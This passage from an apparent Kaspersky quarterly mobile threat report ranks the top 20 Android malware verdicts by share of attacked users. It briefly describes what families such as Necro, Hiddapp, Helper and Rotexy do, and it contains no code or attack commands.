[Hqwar](<https://securelist.com/hqwar-the-higher-it-flies-the-harder-it-drops/93689/>) (8%) far behind.\n\nIt is worth noting that mobile droppers are most often used for installing financial malware, although some financial threats can spread without their help. The share of these self-sufficient threats is quite substantial: in particular, the share of Trojan-Banker in Q1 increased by 2.1 p.p. to 3.65%.\n\n### Top 20 mobile malware programs\n\n_Note that this malware rankings do not include potentially dangerous or unwanted programs such as RiskTool or adware._\n\n| **Verdict ** | **%*** \n---|---|--- \n1 | DangerousObject.Multi.Generic | 44.89 \n2 | Trojan.AndroidOS.Boogr.gsh | 9.09 \n3 | DangerousObject.AndroidOS.GenericML | 7.08 \n4 | Trojan-Downloader.AndroidOS.Necro.d | 4.52 \n5 | Trojan.AndroidOS.Hiddapp.ch | 2.73 \n6 | Trojan-Downloader.AndroidOS.Helper.a | 2.45 \n7 | Trojan.AndroidOS.Handda.san | 2.31 \n8 | Trojan-Dropper.AndroidOS.Necro.z | 2.30 \n9 | Trojan.AndroidOS.Necro.a | 2.19 \n10 | Trojan-Downloader.AndroidOS.Necro.b | 1.94 \n11 | Trojan-Dropper.AndroidOS.Hqwar.gen | 1.82 \n12 | Trojan-Dropper.AndroidOS.Helper.l | 1.50 \n13 | Exploit.AndroidOS.Lotoor.be | 1.46 \n14 | Trojan-Dropper.AndroidOS.Lezok.p | 1.46 \n15 | Trojan-Banker.AndroidOS.Rotexy.e | 1.43 \n16 | Trojan-Dropper.AndroidOS.Penguin.e | 1.42 \n17 | Trojan-SMS.AndroidOS.Prizmes.a | 1.39 \n18 | Trojan.AndroidOS.Dvmap.a | 1.24 \n19 | Trojan.AndroidOS.Agent.rt | 1.21 \n20 | Trojan.AndroidOS.Vdloader.a | 1.18 \n \n_* Unique users attacked by this malware as a percentage of all users of Kaspersky mobile products that were attacked._\n\nFirst place in our Top 20 as ever went to DangerousObject.Multi.Generic (44.89%), the verdict we use for malware detected [using cloud technology](<https://www.kaspersky.com/enterprise-security/wiki-section/products/big-data-the-astraea-technology>). They are triggered when the antivirus databases still lack the data for detecting a malicious program, but the Kaspersky Security Network cloud already contains information about the object. This is basically how the latest malware is detected.\n\nSecond and third places were claimed by Trojan.AndroidOS.Boogr.gsh (9.09%) and DangerousObject.AndroidOS.GenericML (7,08%) respectively. These verdicts are assigned to files that are recognized as malicious by our [machine-learning systems](<https://www.kaspersky.com/enterprise-security/wiki-section/products/machine-learning-in-cybersecurity>).\n\nIn fourth (Trojan-Downloader.AndroidOS.Necro.d, 4.52%) and tenth (Trojan-Downloader.AndroidOS.Necro.b, 1.94%) places are members of the Necro family, whose main task is to download and install modules from cybercriminal servers. Eighth-placed Trojan-Dropper.AndroidOS.Necro.z (2.30%) acts in a similar way, extracting from itself only those modules that it needs. As for Trojan.AndroidOS.Necro.a, which took ninth place (2.19%), cybercriminals assigned it a different task: the trojan follows advertising links and clicks banner ads in the victim's name.\n\nTrojan.AndroidOS.Hiddapp.ch (2.73%) claimed fifth spot. As soon as it runs, the malware hides its icon on the list of apps and continues to operate in the background. The trojan's payload can be other trojan programs or adware apps.\n\nSixth place went to Trojan-Downloader.AndroidOS.Helper.a (2.45%), which is what Trojan-Downloader.AndroidOS.Necro usually delivers. Helper.a is tasked with downloading arbitrary code from the cybercriminals' server and running it.\n\nThe verdict Trojan.AndroidOS.Handda.san (2.31%) in seventh place is a group of diverse trojans that hide their icons, gain Device Admin rights on the device, and use packers to evade detection.\n\nTrojan-Banker.AndroidOS.Rotexy.e (1.43%) and Trojan-Dropper.AndroidOS.Penguin.e (1.42%) warrant a special mention. The former is the only banking trojan in the top 20 this past quarter. The Rotexy family is all of six years old, and its members have the functionality to steal bank card details and intercept two-factor payment authorization messages. In turn, the first member of the Penguin dropper family was only detected last July and had gained significant popularity by Q1 2020.\n\n### Geography of mobile threats\n\n \n\n_Map of